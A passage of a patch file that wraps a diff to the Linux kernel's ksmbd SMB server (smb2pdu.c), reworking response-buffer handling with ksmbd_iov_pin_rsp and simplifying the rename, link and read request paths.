+ 	rsp->OutputBufferLength = cpu_to_le32(rsp_data_cnt);
+-	inc_rfc1001_len(rsp_org, rsp_data_cnt);
+ out:
+ 	kvfree(xattr_list);
+ 	return rc;
+@@ -4399,7 +4459,6 @@ static void get_file_access_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->AccessFlags = fp->daccess;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_access_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_access_info));
+ }
+ 
+ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+@@ -4429,7 +4488,6 @@ static int get_file_basic_info(struct smb2_query_info_rsp *rsp,
+ 	basic_info->Pad1 = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_basic_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_basic_info));
+ 	return 0;
+ }
+ 
+@@ -4454,8 +4512,6 @@ static void get_file_standard_info(struct smb2_query_info_rsp *rsp,
+ 	sinfo->Directory = S_ISDIR(stat.mode) ? 1 : 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_standard_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_standard_info));
+ }
+ 
+ static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+@@ -4467,8 +4523,6 @@ static void get_file_alignment_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->AlignmentRequirement = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_alignment_info));
+-	inc_rfc1001_len(rsp_org,
+-			sizeof(struct smb2_file_alignment_info));
+ }
+ 
+ static int get_file_all_info(struct ksmbd_work *work,
+@@ -4532,7 +4586,6 @@ static int get_file_all_info(struct ksmbd_work *work,
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_all_info) + conv_len - 1);
+ 	kfree(filename);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+ 	return 0;
+ }
+ 
+@@ -4555,7 +4608,6 @@ static void get_file_alternate_info(struct ksmbd_work *work,
+ 	file_info->FileNameLength = cpu_to_le32(conv_len);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_alt_name_info) + conv_len);
+-	inc_rfc1001_len(rsp_org, le32_to_cpu(rsp->OutputBufferLength));
+ }
+ 
+ static void get_file_stream_info(struct ksmbd_work *work,
+@@ -4655,7 +4707,6 @@ out:
+ 	kvfree(xattr_list);
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(nbytes);
+-	inc_rfc1001_len(rsp_org, nbytes);
+ }
+ 
+ static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+@@ -4670,7 +4721,6 @@ static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->IndexNumber = cpu_to_le64(stat.ino);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+ }
+ 
+ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+@@ -4706,7 +4756,6 @@ static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->Reserved = cpu_to_le32(0);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
+ 	return 0;
+ }
+ 
+@@ -4718,7 +4767,6 @@ static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
+ 	file_info->EASize = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_ea_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
+ }
+ 
+ static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+@@ -4730,7 +4778,6 @@ static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_pos_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
+ }
+ 
+ static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+@@ -4742,7 +4789,6 @@ static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_mode_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
+ }
+ 
+ static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+@@ -4764,7 +4810,6 @@ static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+ 
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_comp_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
+ }
+ 
+ static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+@@ -4783,11 +4828,10 @@ static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+ 	file_info->ReparseTag = 0;
+ 	rsp->OutputBufferLength =
+ 		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
+ 	return 0;
+ }
+ 
+-static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
++static void find_file_posix_info(struct smb2_query_info_rsp *rsp,
+ 				struct ksmbd_file *fp, void *rsp_org)
+ {
+ 	struct smb311_posix_qinfo *file_info;
+@@ -4825,8 +4869,6 @@ static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
+ 		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
+-	inc_rfc1001_len(rsp_org, out_buf_len);
+-	return out_buf_len;
+ }
+ 
+ static int smb2_get_info_file(struct ksmbd_work *work,
+@@ -4836,7 +4878,6 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	struct ksmbd_file *fp;
+ 	int fileinfoclass = 0;
+ 	int rc = 0;
+-	int file_infoclass_size;
+ 	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+@@ -4869,85 +4910,69 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	switch (fileinfoclass) {
+ 	case FILE_ACCESS_INFORMATION:
+ 		get_file_access_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_BASIC_INFORMATION:
+ 		rc = get_file_basic_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_STANDARD_INFORMATION:
+ 		get_file_standard_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALIGNMENT_INFORMATION:
+ 		get_file_alignment_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALL_INFORMATION:
+ 		rc = get_file_all_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ALTERNATE_NAME_INFORMATION:
+ 		get_file_alternate_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_STREAM_INFORMATION:
+ 		get_file_stream_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_INTERNAL_INFORMATION:
+ 		get_file_internal_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_NETWORK_OPEN_INFORMATION:
+ 		rc = get_file_network_open_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_EA_INFORMATION:
+ 		get_file_ea_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_FULL_EA_INFORMATION:
+ 		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
+-		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_POSITION_INFORMATION:
+ 		get_file_position_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_MODE_INFORMATION:
+ 		get_file_mode_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_COMPRESSION_INFORMATION:
+ 		get_file_compression_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
+ 		break;
+ 
+ 	case FILE_ATTRIBUTE_TAG_INFORMATION:
+ 		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
+ 		break;
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		if (!work->tcon->posix_extensions) {
+ 			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
+ 			rc = -EOPNOTSUPP;
+ 		} else {
+-			file_infoclass_size = find_file_posix_info(rsp, fp,
+-					work->response_buf);
++			find_file_posix_info(rsp, fp, work->response_buf);
+ 		}
+ 		break;
+ 	default:
+@@ -4957,8 +4982,7 @@ static int smb2_get_info_file(struct ksmbd_work *work,
+ 	}
+ 	if (!rc)
+ 		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, work->response_buf,
+-				      file_infoclass_size);
++				      rsp, work->response_buf);
+ 	ksmbd_fd_put(work, fp);
+ 	return rc;
+ }
+@@ -4974,7 +4998,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 	struct kstatfs stfs;
+ 	struct path path;
+ 	int rc = 0, len;
+-	int fs_infoclass_size = 0;
+ 
+ 	if (!share->path)
+ 		return -EIO;
+@@ -5004,8 +5027,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->DeviceType = cpu_to_le32(stfs.f_type);
+ 		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
+ 		rsp->OutputBufferLength = cpu_to_le32(8);
+-		inc_rfc1001_len(work->response_buf, 8);
+-		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_ATTRIBUTE_INFORMATION:
+@@ -5034,8 +5055,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->FileSystemNameLen = cpu_to_le32(len);
+ 		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
+ 		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_VOLUME_INFORMATION:
+@@ -5062,8 +5081,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->Reserved = 0;
+ 		sz = sizeof(struct filesystem_vol_info) - 2 + len;
+ 		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_SIZE_INFORMATION:
+@@ -5076,8 +5093,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+ 		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+ 		rsp->OutputBufferLength = cpu_to_le32(24);
+-		inc_rfc1001_len(work->response_buf, 24);
+-		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_FULL_SIZE_INFORMATION:
+@@ -5093,8 +5108,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+ 		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+ 		rsp->OutputBufferLength = cpu_to_le32(32);
+-		inc_rfc1001_len(work->response_buf, 32);
+-		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_OBJECT_ID_INFORMATION:
+@@ -5114,8 +5127,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->extended_info.rel_date = 0;
+ 		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
+ 		rsp->OutputBufferLength = cpu_to_le32(64);
+-		inc_rfc1001_len(work->response_buf, 64);
+-		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_SECTOR_SIZE_INFORMATION:
+@@ -5137,8 +5148,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->ByteOffsetForSectorAlignment = 0;
+ 		info->ByteOffsetForPartitionAlignment = 0;
+ 		rsp->OutputBufferLength = cpu_to_le32(28);
+-		inc_rfc1001_len(work->response_buf, 28);
+-		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_CONTROL_INFORMATION:
+@@ -5159,8 +5168,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
+ 		info->Padding = 0;
+ 		rsp->OutputBufferLength = cpu_to_le32(48);
+-		inc_rfc1001_len(work->response_buf, 48);
+-		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
+ 		break;
+ 	}
+ 	case FS_POSIX_INFORMATION:
+@@ -5180,8 +5187,6 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
+ 			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
+ 			rsp->OutputBufferLength = cpu_to_le32(56);
+-			inc_rfc1001_len(work->response_buf, 56);
+-			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
+ 		}
+ 		break;
+ 	}
+@@ -5190,8 +5195,7 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 		return -EOPNOTSUPP;
+ 	}
+ 	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-			      rsp, work->response_buf,
+-			      fs_infoclass_size);
++			      rsp, work->response_buf);
+ 	path_put(&path);
+ 	return rc;
+ }
+@@ -5225,7 +5229,6 @@ static int smb2_get_info_sec(struct ksmbd_work *work,
+ 
+ 		secdesclen = sizeof(struct smb_ntsd);
+ 		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-		inc_rfc1001_len(work->response_buf, secdesclen);
+ 
+ 		return 0;
+ 	}
+@@ -5270,7 +5273,6 @@ static int smb2_get_info_sec(struct ksmbd_work *work,
+ 		return rc;
+ 
+ 	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-	inc_rfc1001_len(work->response_buf, secdesclen);
+ 	return 0;
+ }
+ 
+@@ -5309,6 +5311,14 @@ int smb2_query_info(struct ksmbd_work *work)
+ 		rc = -EOPNOTSUPP;
+ 	}
+ 
++	if (!rc) {
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(72);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       offsetof(struct smb2_query_info_rsp, Buffer) +
++					le32_to_cpu(rsp->OutputBufferLength));
++	}
++
+ 	if (rc < 0) {
+ 		if (rc == -EACCES)
+ 			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+@@ -5316,6 +5326,8 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			rsp->hdr.Status = STATUS_FILE_CLOSED;
+ 		else if (rc == -EIO)
+ 			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++		else if (rc == -ENOMEM)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+ 		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
+ 			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+ 		smb2_set_err_rsp(work);
+@@ -5324,9 +5336,6 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			    rc);
+ 		return rc;
+ 	}
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->OutputBufferOffset = cpu_to_le16(72);
+-	inc_rfc1001_len(work->response_buf, 8);
+ 	return 0;
+ }
+ 
+@@ -5357,8 +5366,9 @@ static noinline int smb2_close_pipe(struct ksmbd_work *work)
+ 	rsp->AllocationSize = 0;
+ 	rsp->EndOfFile = 0;
+ 	rsp->Attributes = 0;
+-	inc_rfc1001_len(work->response_buf, 60);
+-	return 0;
++
++	return ksmbd_iov_pin_rsp(work, (void *)rsp,
++				 sizeof(struct smb2_close_rsp));
+ }
+ 
+ /**
+@@ -5463,15 +5473,17 @@ int smb2_close(struct ksmbd_work *work)
+ 
+ 	err = ksmbd_close_fd(work, volatile_id);
+ out:
++	if (!err)
++		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++					sizeof(struct smb2_close_rsp));
++
+ 	if (err) {
+ 		if (rsp->hdr.Status == 0)
+ 			rsp->hdr.Status = STATUS_FILE_CLOSED;
+ 		smb2_set_err_rsp(work);
+-	} else {
+-		inc_rfc1001_len(work->response_buf, 60);
+ 	}
+ 
+-	return 0;
++	return err;
+ }
+ 
+ /**
+@@ -5489,50 +5501,24 @@ int smb2_echo(struct ksmbd_work *work)
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
++	return ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_echo_rsp));
+ }
+ 
+ static int smb2_rename(struct ksmbd_work *work,
+ 		       struct ksmbd_file *fp,
+-		       struct user_namespace *user_ns,
+ 		       struct smb2_file_rename_info *file_info,
+ 		       struct nls_table *local_nls)
+ {
+ 	struct ksmbd_share_config *share = fp->tcon->share_conf;
+-	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
+-	char *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
++	char *new_name = NULL;
++	int rc, flags = 0;
+ 
+ 	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
+-	if (IS_ERR(abs_oldname)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	old_name = strrchr(abs_oldname, '/');
+-	if (old_name && old_name[1] != '\0') {
+-		old_name++;
+-	} else {
+-		ksmbd_debug(SMB, "can't get last component in path %s\n",
+-			    abs_oldname);
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+ 	new_name = smb2_get_name(file_info->FileName,
+ 				 le32_to_cpu(file_info->FileNameLength),
+ 				 local_nls);
+-	if (IS_ERR(new_name)) {
+-		rc = PTR_ERR(new_name);
+-		goto out;
+-	}
++	if (IS_ERR(new_name))
++		return PTR_ERR(new_name);
+ 
+ 	if (strchr(new_name, ':')) {
+ 		int s_type;
+@@ -5558,10 +5544,10 @@ static int smb2_rename(struct ksmbd_work *work,
+ 		if (rc)
+ 			goto out;
+ 
+-		rc = ksmbd_vfs_setxattr(user_ns,
+-					fp->filp->f_path.dentry,
++		rc = ksmbd_vfs_setxattr(file_mnt_user_ns(fp->filp),
++					&fp->filp->f_path,
+ 					xattr_stream_name,
+-					NULL, 0, 0);
++					NULL, 0, 0, true);
+ 		if (rc < 0) {
+ 			pr_err("failed to store stream name in xattr: %d\n",
+ 			       rc);
+@@ -5573,47 +5559,18 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	}
+ 
+ 	ksmbd_debug(SMB, "new name %s\n", new_name);
+-	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+ 	if (ksmbd_share_veto_filename(share, new_name)) {
+ 		rc = -ENOENT;
+ 		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
+ 		goto out;
+ 	}
+ 
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, new_name);
+-			if (rc) {
+-				if (rc != -ENOTEMPTY)
+-					rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
+-					    new_name, rc);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present &&
+-		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB,
+-				    "cannot rename already existing file\n");
+-			goto out;
+-		}
+-	}
++	if (!file_info->ReplaceIfExists)
++		flags = RENAME_NOREPLACE;
+ 
+-	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
++	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
+ out:
+-	kfree(pathname);
+-	if (!IS_ERR(new_name))
+-		kfree(new_name);
++	kfree(new_name);
+ 	return rc;
+ }
+ 
+@@ -5624,8 +5581,8 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 			    struct nls_table *local_nls)
+ {
+ 	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
++	struct path path, parent_path;
++	bool file_present = false;
+ 	int rc;
+ 
+ 	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
+@@ -5653,18 +5610,17 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 	}
+ 
+ 	ksmbd_debug(SMB, "target name is %s\n", target_name);
+-	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
++	rc = ksmbd_vfs_kern_path_locked(work, link_name, LOOKUP_NO_SYMLINKS,
++					&parent_path, &path, 0);
+ 	if (rc) {
+ 		if (rc != -ENOENT)
+ 			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
++	} else
++		file_present = true;
+ 
+ 	if (file_info->ReplaceIfExists) {
+ 		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, link_name);
++			rc = ksmbd_vfs_remove_file(work, &path);
+ 			if (rc) {
+ 				rc = -EINVAL;
+ 				ksmbd_debug(SMB, "cannot delete %s\n",
+@@ -5684,6 +5640,9 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 	if (rc)
+ 		rc = -EINVAL;
+ out:
++	if (file_present)
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
+ 	if (!IS_ERR(link_name))
+ 		kfree(link_name);
+ 	kfree(pathname);
+@@ -5750,8 +5709,8 @@ static int set_file_basic_info(struct ksmbd_file *fp,
+ 		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+ 			XATTR_DOSINFO_ITIME;
+ 
+-		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						    filp->f_path.dentry, &da);
++		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns, &filp->f_path, &da,
++				true);
+ 		if (rc)
+ 			ksmbd_debug(SMB,
+ 				    "failed to restore file attribute in EA\n");
+@@ -5861,12 +5820,6 @@ static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			   struct smb2_file_rename_info *rename_info,
+ 			   unsigned int buf_len)
+ {
+-	struct user_namespace *user_ns;
+-	struct ksmbd_file *parent_fp;
+-	struct dentry *parent;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int ret;
+-
+ 	if (!(fp->daccess & FILE_DELETE_LE)) {
+ 		pr_err("no right to delete : 0x%x\n", fp->daccess);
+ 		return -EACCES;
+@@ -5876,32 +5829,10 @@ static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			le32_to_cpu(rename_info->FileNameLength))
+ 		return -EINVAL;
+ 
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	if (ksmbd_stream_fd(fp))
+-		goto next;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
++	if (!le32_to_cpu(rename_info->FileNameLength))
++		return -EINVAL;
+ 
+-	if (parent_fp) {
+-		if (parent_fp->daccess & FILE_DELETE_LE) {
+-			pr_err("parent dir is opened with delete access\n");
+-			ksmbd_fd_put(work, parent_fp);
+-			return -ESHARE;
+-		}
+-		ksmbd_fd_put(work, parent_fp);
+-	}
+-next:
+-	return smb2_rename(work, fp, user_ns, rename_info,
+-			   work->conn->local_nls);
++	return smb2_rename(work, fp, rename_info, work->conn->local_nls);
+ }
+ 
+ static int set_file_disposition_info(struct ksmbd_file *fp,
+@@ -6091,7 +6022,7 @@ static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
+ 	fp->saccess |= FILE_SHARE_DELETE_LE;
+ 
+ 	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
+-			buf_len, false);
++			buf_len, false, true);
+ }
+ 
+ /**
+@@ -6161,7 +6092,10 @@ int smb2_set_info(struct ksmbd_work *work)
+ 		goto err_out;
+ 
+ 	rsp->StructureSize = cpu_to_le16(2);
+-	inc_rfc1001_len(work->response_buf, 2);
++	rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++			       sizeof(struct smb2_set_info_rsp));
++	if (rc)
++		goto err_out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6208,28 +6142,36 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 
+ 	id = req->VolatileFileId;
+ 
+-	inc_rfc1001_len(work->response_buf, 16);
+ 	rpc_resp = ksmbd_rpc_read(work->sess, id);
+ 	if (rpc_resp) {
++		void *aux_payload_buf;
++
+ 		if (rpc_resp->flags != KSMBD_RPC_OK) {
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		work->aux_payload_buf =
+-			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!work->aux_payload_buf) {
++		aux_payload_buf =
++			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL);
++		if (!aux_payload_buf) {
+ 			err = -ENOMEM;
+ 			goto out;
+ 		}
+ 
+-		memcpy(work->aux_payload_buf, rpc_resp->payload,
+-		       rpc_resp->payload_sz);
++		memcpy(aux_payload_buf, rpc_resp->payload, rpc_resp->payload_sz);
+ 
+ 		nbytes = rpc_resp->payload_sz;
+-		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-		work->aux_payload_sz = nbytes;
++		err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
++					     offsetof(struct smb2_read_rsp, Buffer),
++					     aux_payload_buf, nbytes);
++		if (err)
++			goto out;
+ 		kvfree(rpc_resp);
++	} else {
++		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++					offsetof(struct smb2_read_rsp, Buffer));
++		if (err)
++			goto out;
+ 	}
+ 
+ 	rsp->StructureSize = cpu_to_le16(17);
+@@ -6238,7 +6180,6 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+ 	return 0;
+ 
+ out:
+@@ -6312,13 +6253,8 @@ int smb2_read(struct ksmbd_work *work)
+ 	int err = 0;
+ 	bool is_rdma_channel = false;
+ 	unsigned int max_read_size = conn->vals->max_read_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-	if (work->next_smb2_rcv_hdr_off) {
+-		work->send_no_response = 1;
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++	void *aux_payload_buf;
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+ 				   KSMBD_SHARE_FLAG_PIPE)) {
+@@ -6326,6 +6262,25 @@ int smb2_read(struct ksmbd_work *work)
+ 		return smb2_read_pipe(work);
+ 	}
+ 
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++					work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
+ 	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
